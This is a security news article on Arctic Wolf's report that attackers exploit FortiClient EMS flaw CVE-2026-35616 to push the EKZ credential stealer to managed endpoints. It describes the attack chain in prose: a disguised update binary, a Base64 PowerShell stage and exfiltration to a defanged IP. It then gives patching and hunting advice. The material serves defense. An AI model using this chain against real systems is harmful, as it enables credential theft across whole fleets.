FortiClient EMS CVE-2026-35616 Is Now Pushing the EKZ Credential Stealer, Arctic Wolf Says

An endpoint-management console that has not been patched is no longer a missed-update problem. It is a malware-distribution platform waiting for an operator, and the EKZ campaign is the live demonstration.

EDEN PRAIRIE, MINNESOTA — Arctic Wolf said on May 28, 2026 that threat actors are actively exploiting CVE-2026-35616, a FortiClient Enterprise Management Server (EMS) pre-authentication API access bypass that Fortinet patched in April 2026, to deploy a previously unreported Windows credential stealer that Arctic Wolf is calling EKZ. The campaign abuses unpatched EMS servers as a software-distribution channel, pushing a malicious binary disguised as a Fortinet endpoint update down to every endpoint the compromised server manages. BleepingComputer and The Hacker News covered the Arctic Wolf research the same day.

Fortinet fixed CVE-2026-35616 in FortiClient EMS 7.4.7 and later. The flaw carries a CVSS v3.1 score of 9.1, and active exploitation has continued against organizations that have not yet upgraded.

What Happened

Arctic Wolf disclosed on May 28, 2026 that threat actors are actively exploiting CVE-2026-35616 to deploy a credential stealer the firm is calling EKZ. The flaw is a pre-authentication API access bypass in the FortiClient Enterprise Management Server that allows privilege escalation, and Fortinet patched it in FortiClient EMS 7.4.7 and later in April 2026. The campaign Arctic Wolf documented targets EMS instances that have not yet been upgraded — unpatched servers that remain reachable seven weeks after the fix shipped. According to Arctic Wolf, once an EMS server is compromised through CVE-2026-35616, the operator uses the platform's own management functionality to push a malicious binary to every endpoint the server manages.

The malicious binary is delivered as FortiEndpoint_Patch.exe, a previously unreported Windows information stealer disguised as a legitimate Fortinet endpoint update. Arctic Wolf described the execution chain in detail: a legitimate FortiClient executable, fortitray.exe, launches a .cmd script that invokes a Base64-encoded PowerShell command, which downloads and runs the stealer and exfiltrates the captured data over HTTP POST to 83.138.53[.]110 (defanged). The stealer harvests passwords, cookies, autofill entries, credit card information, addresses, and phone numbers from Chromium- and Gecko-based browsers, writes the data to a log file in the ProgramData directory, and relies on the PowerShell stage — not the binary itself — for network exfiltration. Arctic Wolf also observed the operators modifying EMS configuration to defer firmware-upgrade reminders and editing a Remote Access Profile and endpoint policy to insert the malicious script for endpoint execution.

Why an EMS Compromise Is a Fleet-Wide Compromise

The FortiClient EMS is a centralized endpoint-management console. Every FortiClient endpoint connected to it trusts what it sends, accepts configuration changes, and runs the software it pushes — that is the entire purpose of an EMS deployment. CVE-2026-35616, the same flaw The CyberSignal covered when Fortinet shipped emergency patches for it in April, turns that trust into a delivery mechanism. Arctic Wolf summarized the dynamic plainly: "The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints." Once an attacker can modify EMS configuration through the API bypass, in Arctic Wolf's own framing, "every managed endpoint became a potential execution target without requiring a separate intrusion path to each device." The blast radius of a CVE-2026-35616 exploit is not the management server. It is every endpoint that server manages, and the trust relationship in between converts a single server compromise into a fleet-wide event.

The Post-Patch Active-Exploitation Update

The CyberSignal covered the original disclosure of CVE-2026-35616 as an actively exploited zero-day in April 2026, when Fortinet shipped emergency patches. The Arctic Wolf research is the update on what has happened in the seven weeks since that patch became available. The vulnerability is the same flaw, the patched version is FortiClient EMS 7.4.7, and the unpatched footprint is still being weaponized — only now the post-exploitation payload has a name (EKZ) and a documented behavior chain. The pattern is familiar across 2026's exploited-CVE landscape: the patch ships, federal deadlines pass, and yet operators continue to find unpatched instances and convert them into useful infrastructure. The newly significant detail in this campaign is not novelty in the flaw, but the demonstration of what an unpatched EMS server actually is in the attacker's economy: a ready-made software-distribution channel.

Endpoint-Management Consoles as a Tier-0 Attack Surface

FortiClient EMS belongs to a category of products — alongside platforms like Tanium, Microsoft Intune, and other endpoint-management or RMM tools — whose architectural job is to push software and configuration changes at scale. That centralization is the value proposition, and it is also a concentration of risk that has become a defining attack surface of 2026. The Verizon DBIR 2026 found that vulnerability exploitation just overtook credential theft as the number-one initial-access method, and the EKZ campaign is a precise instance of that pattern: an exploited CVE in a centrally managed platform yields a path to every device on the other side of it. Endpoint-management consoles should now be treated as Tier 0 alongside domain controllers and identity providers — patched on the same urgency cycle, segmented from the public internet wherever feasible, and protected with the same level of monitoring and access controls — because when they fail, they fail toward the whole fleet.

Scope and Impact

The scope of the EKZ campaign is bounded by one variable: the population of FortiClient EMS instances that have not been upgraded to 7.4.7 or later. Arctic Wolf has not published a victim count, and Fortinet has not stated how many unpatched instances remain exposed. What is clear is that any organization still running a vulnerable EMS is a candidate target, and any organization whose EMS may have been compromised since the April patch must treat every endpoint that received a software push during the exposure window as potentially carrying an EKZ-linked binary. Session cookies and saved browser credentials harvested from those endpoints, Arctic Wolf noted, may provide threat actors with follow-on access to cloud services, internal applications, and other authenticated resources — and session reuse can in some cases circumvent MFA prompts.

Several specifics remain unconfirmed. Arctic Wolf has not attributed the campaign to a named threat actor, has not disclosed how many EMS servers have been observed compromised, and has not detailed how operators are locating vulnerable instances at scale. Indicators of compromise — beyond the FortiEndpoint_Patch.exe filename, the fortitray.exe → cmd.exe → PowerShell launch chain, and the 83.138.53[.]110 exfiltration endpoint — have not been comprehensively published, and defenders should monitor the Arctic Wolf research blog for further IOC releases. The campaign also lands in the same broader pattern as other unpatched edge-software exploitation The CyberSignal has tracked, including the Gogs argument-injection RCE that remains unpatched and rated CVSS v4 9.4 — unpatched, high-impact code in widely deployed infrastructure remains the most reliable initial-access surface in 2026.

On the federal-deadline picture: CVE-2026-35616 was added to the CISA Known Exploited Vulnerabilities catalog at the time of the original April exploitation. The Arctic Wolf research does not constitute a new KEV listing; the vulnerability has been on KEV for weeks. What the EKZ campaign does change is the operational posture: organizations that were planning a routine patch cadence around CVE-2026-35616 should now treat any unpatched FortiClient EMS instance as an in-progress incident waiting to be discovered, not a backlog item.

Response and Attribution

For any organization running FortiClient EMS, the action is immediate. Verify that every EMS instance is upgraded to FortiClient EMS 7.4.7 or later — and treat any instance that was internet-reachable and unpatched at any point since the April fix as compromised until proven otherwise. Audit all endpoint-software pushes performed by EMS in the last 60 days for unexpected binaries claiming Fortinet metadata, with particular attention to anything resembling FortiEndpoint_Patch.exe; pull suspicious binaries for analysis. Force-rotate every credential that may have been resident on any endpoint that received an EMS-distributed push during the active-exploitation window, including saved browser passwords, cookies, and tokens that could enable MFA bypass through session reuse. Watch the Arctic Wolf research feed for further EKZ IOC releases and sweep historical telemetry across the fleet as new indicators land.

For SOC and threat-hunting teams, the practical hunts are well-defined. Look for binaries that carry Fortinet metadata but lack valid Fortinet code-signing chains. Hunt for the documented launch chain: fortitray.exe spawning cmd.exe to run a .cmd script that invokes a Base64-encoded PowerShell command. Look for outbound HTTP POST traffic from endpoints to 83.138.53[.]110 (defanged), and pivot on outbound credential-exfiltration patterns from any endpoint that received a push through a potentially compromised EMS. Treat any endpoint-management-server compromise — FortiClient EMS, Tanium, Intune, or equivalent — as a fleet-tier incident from the first minute, not an instance-tier event.

For CISOs, EKZ is the latest confirmation that endpoint-management consoles are now a primary attack-surface category, not infrastructure-as-second-thought — exactly the pattern the Verizon DBIR 2026 documented when vulnerability exploitation overtook credential theft as the number-one initial-access method. The CISA KEV deadline cycle compresses faster than centralized-management patch SLOs typically allow, which is the structural problem this campaign exposes: a patch shipped in April is still finding unpatched targets in late May. The remediation discipline has to match the architecture. Endpoint-management infrastructure should be patched on the same urgency cycle as domain controllers, monitored with the same intensity, and segmented and access-controlled the same way. Arctic Wolf has not attributed the EKZ campaign to a named threat actor.

The CyberSignal Analysis

Signal 01 — Unpatched EMS Is a Malware-Distribution Channel

The single sharpest editorial point from Arctic Wolf's research is structural: an unpatched FortiClient EMS server is not a missed-update problem. It is a software-distribution channel that an attacker can rent for free by exploiting CVE-2026-35616. The platform's entire value proposition — push software and configuration to managed endpoints, at scale, with trust — is what the operator uses. That reframing matters because it changes how the unpatched footprint should be triaged. An EMS instance running 7.4.6 in the corner of a network is not 'one server behind on patches.' It is an unattended delivery system for whatever malware the next operator wants to ship to every endpoint downstream of it. EKZ is the demonstration. It will not be the last payload to ride this same channel.

Signal 02 — Treat Endpoint-Management Compromise as a Fleet Incident by Default

Most security operations centers default to instance-tier incident response: the box, the host, the affected user. That posture is exactly wrong for an endpoint-management compromise, and CVE-2026-35616 is the textbook example of why. The architectural job of an EMS is to fan changes out to every endpoint it manages. Compromise the server and you compromise the fan-out. The defensive implication is that the first incident-response playbook to run when an EMS is suspected compromised is the fleet-tier one — assume every managed endpoint received a malicious push during the exposure window, plan for fleet-wide credential rotation and integrity verification, and only narrow the scope once telemetry justifies it. Starting narrow and widening costs days the campaign does not need to give defenders.

Signal 03 — Patching the CVE Does Not Close the Incident

Fortinet shipped the fix for CVE-2026-35616 in April. Arctic Wolf is publishing in late May about active exploitation that has continued through the seven-week gap. The lesson generalizes well beyond one vendor: for any critical CVE in centrally managed infrastructure, the patch closes the window for new exploitation but does nothing for instances that were already compromised. The post-patch hunt — sweeping for the actual on-endpoint behaviors, the binaries that were pushed, the credentials that were harvested — is its own work, separate from and additional to the patch itself. EKZ is the reminder that 'we patched' is a sentence about future risk, not present state. The present-state question is what got pushed before the upgrade, and that question only gets answered through telemetry, hunting, and credential rotation.

Sources